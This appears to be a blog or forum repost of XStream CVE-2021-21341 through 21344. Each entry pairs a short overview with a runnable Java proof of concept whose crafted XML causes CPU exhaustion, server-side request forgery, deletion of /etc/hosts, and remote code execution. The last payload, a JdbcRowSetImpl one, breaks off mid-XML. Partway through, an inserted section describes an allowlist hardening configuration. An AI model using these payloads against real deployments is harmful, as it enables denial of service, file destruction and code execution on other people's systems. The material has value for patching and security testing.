XStream CVE vulnerabilities
Lalala, I'm just reposting from the official site: https://x-stream.github.io/index.html
CVE-2021-21341
Vulnerability overview:
In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system, depending on the CPU type or on parallel execution of such payloads, resulting in a denial of service only by manipulating the processed input stream.
import com.thoughtworks.xstream.XStream;

public class CVE202121341 {
    public static void main(String[] args) {
        String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
            " <unserializable-parents/>\n" +
            " <java.util.PriorityQueue>\n" +
            " <default>\n" +
            " <size>2</size>\n" +
            " <comparator class='javafx.collections.ObservableList$1'/>\n" +
            " </default>\n" +
            " <int>3</int>\n" +
            " <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\n" +
            " <dataHandler>\n" +
            " <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
            " <is class='java.io.ByteArrayInputStream'>\n" +
            " <buf></buf>\n" +
            " <pos>-2147483648</pos>\n" +
            " <mark>0</mark>\n" +
            " <count>0</count>\n" +
            " </is>\n" +
            " <consumed>false</consumed>\n" +
            " </dataSource>\n" +
            " <transferFlavors/>\n" +
            " </dataHandler>\n" +
            " <dataLen>0</dataLen>\n" +
            " </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\n" +
            " <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\n" +
            " </java.util.PriorityQueue>\n" +
            "</java.util.PriorityQueue>";
        XStream xstream = new XStream();
        xstream.fromXML(xml);
    }
}
CVE-2021-21342
Vulnerability overview:
In XStream before version 1.4.16, there is a vulnerability where the stream processed at unmarshalling time contains type information to recreate the formerly written objects, so XStream creates new instances based on that type information. An attacker can manipulate the processed input stream and replace or inject objects, resulting in a server-side request forgery.
import com.thoughtworks.xstream.XStream;

public class CVE202121342 {
    public static void main(String[] args) {
        String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
            " <unserializable-parents/>\n" +
            " <java.util.PriorityQueue>\n" +
            " <default>\n" +
            " <size>2</size>\n" +
            " <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n" +
            " <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n" +
            " <packet>\n" +
            " <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n" +
            " <dataSource class='javax.activation.URLDataSource'>\n" +
            " <url>http://localhost:8080/internal/:</url>\n" +
            " </dataSource>\n" +
            " </message>\n" +
            " </packet>\n" +
            " </indexMap>\n" +
            " </comparator>\n" +
            " </default>\n" +
            " <int>3</int>\n" +
            " <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
            " <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
            " </java.util.PriorityQueue>\n" +
            "</java.util.PriorityQueue>";
        XStream xstream = new XStream();
        xstream.fromXML(xml);
    }
}
CVE-2021-21343
Vulnerability overview:
In XStream before version 1.4.16, there is a vulnerability where the stream processed at unmarshalling time contains type information to recreate the formerly written objects, so XStream creates new instances based on that type information. An attacker can manipulate the processed input stream and replace or inject objects, which can delete files on the local host.
import com.thoughtworks.xstream.XStream;

public class CVE202121343 {
    public static void main(String[] args) {
        String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
            " <unserializable-parents/>\n" +
            " <java.util.PriorityQueue>\n" +
            " <default>\n" +
            " <size>2</size>\n" +
            " <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n" +
            " <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n" +
            " <packet>\n" +
            " <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n" +
            " <dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'>\n" +
            " <part>\n" +
            " <dataHead>\n" +
            " <tail/>\n" +
            " <head>\n" +
            " <data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'>\n" +
            " <len>3</len>\n" +
            " <data>AQID</data>\n" +
            " </data>\n" +
            " </head>\n" +
            " </dataHead>\n" +
            " <contentTransferEncoding>base64</contentTransferEncoding>\n" +
            " <msg>\n" +
            " <it class='java.util.ArrayList$Itr'>\n" +
            " <cursor>0</cursor>\n" +
            " <lastRet>1</lastRet>\n" +
            " <expectedModCount>4</expectedModCount>\n" +
            " <outer-class>\n" +
            " <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
            " <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
            " <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
            " <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
            " </outer-class>\n" +
            " </it>\n" +
            " <in class='java.io.FileInputStream'>\n" +
            " <fd/>\n" +
            " <channel class='sun.nio.ch.FileChannelImpl'>\n" +
            " <closeLock/>\n" +
            " <open>true</open>\n" +
            " <threads>\n" +
            " <used>-1</used>\n" +
            " </threads>\n" +
            " <parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'>\n" +
            " <sockClient>\n" +
            " <fileName>/etc/hosts</fileName>\n" +
            " <unlinkFile>true</unlinkFile>\n" +
            " </sockClient>\n" +
            " <connectionSync/>\n" +
            " </parent>\n" +
            " </channel>\n" +
            " <closeLock/>\n" +
            " </in>\n" +
            " </msg>\n" +
            " </part>\n" +
            " </dataSource>\n" +
            " </message>\n" +
            " <satellites/>\n" +
            " <invocationProperties/>\n" +
            " </packet>\n" +
            " </indexMap>\n" +
            " </comparator>\n" +
            " </default>\n" +
            " <int>3</int>\n" +
            " <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
            " <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
            " </java.util.PriorityQueue>\n" +
            "</java.util.PriorityQueue>";
        XStream xstream = new XStream();
        xstream.fromXML(xml);
    }
}
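Every PoC on this page starts from the same root element and relies on XStream instantiating JDK classes that the old blacklist did not cover; the mitigation the XStream project documents, besides upgrading to 1.4.16 or later, is an explicit type allowlist, which refuses that root element before any nested class is resolved. The following is an added example, not code from the original post or from the XStream project; the `Order` class and the `com.example.model` package are hypothetical.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class HardenedXStream {

    // Hypothetical application model type: the only non-JDK class we ever want created.
    public static class Order {
        public String id;
        public int quantity;
    }

    // Build an XStream whose security framework permits nothing but an explicit allowlist.
    public static XStream hardened() {
        XStream xstream = new XStream();
        // Drop every implicit permission: deny-by-default instead of a blacklist of gadgets.
        xstream.addPermission(NoTypePermission.NONE);
        // Re-admit only what the model actually needs.
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[] { String.class, Order.class });
        // Hypothetical package wildcard for the rest of the application's model classes.
        xstream.allowTypesByWildcard(new String[] { "com.example.model.**" });
        xstream.alias("order", Order.class);
        return xstream;
    }

    // Returns true when the allowlist refuses the untrusted document.
    public static boolean rejects(String untrustedXml) {
        try {
            hardened().fromXML(untrustedXml);
            return false;
        } catch (ForbiddenClassException e) {
            // XStream fails on the first disallowed type name (here java.util.PriorityQueue),
            // so the nested JDK classes used by the payloads are never even looked up.
            return true;
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: a legitimate document and the root element shared by the PoCs.
        String good = "<order><id>A-1</id><quantity>2</quantity></order>";
        String bad = "<java.util.PriorityQueue serialization='custom'/>";
        Order o = (Order) hardened().fromXML(good);
        System.out.println("parsed order " + o.id + " x" + o.quantity);
        System.out.println("payload rejected: " + rejects(bad));
    }
}
```

The same configuration belongs in any deserialization path that accepts input from the network; keeping the allowlist to model types only is what makes it independent of which JDK gadget the next CVE uses.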
CVE-2021-21344
Vulnerability overview:
In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.
import com.thoughtworks.xstream.XStream;

public class CVE202121344 {
    public static void main(String[] args) {
        String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
            " <unserializable-parents/>\n" +
            " <java.util.PriorityQueue>\n" +
            " <default>\n" +
            " <size>2</size>\n" +
            " <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n" +
            " <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n" +
            " <packet>\n" +
            " <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n" +
            " <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n" +
            " <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n" +
            " <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n" +
            " <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n" +
            " <jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>\n" +
            " <uriProperties/>\n" +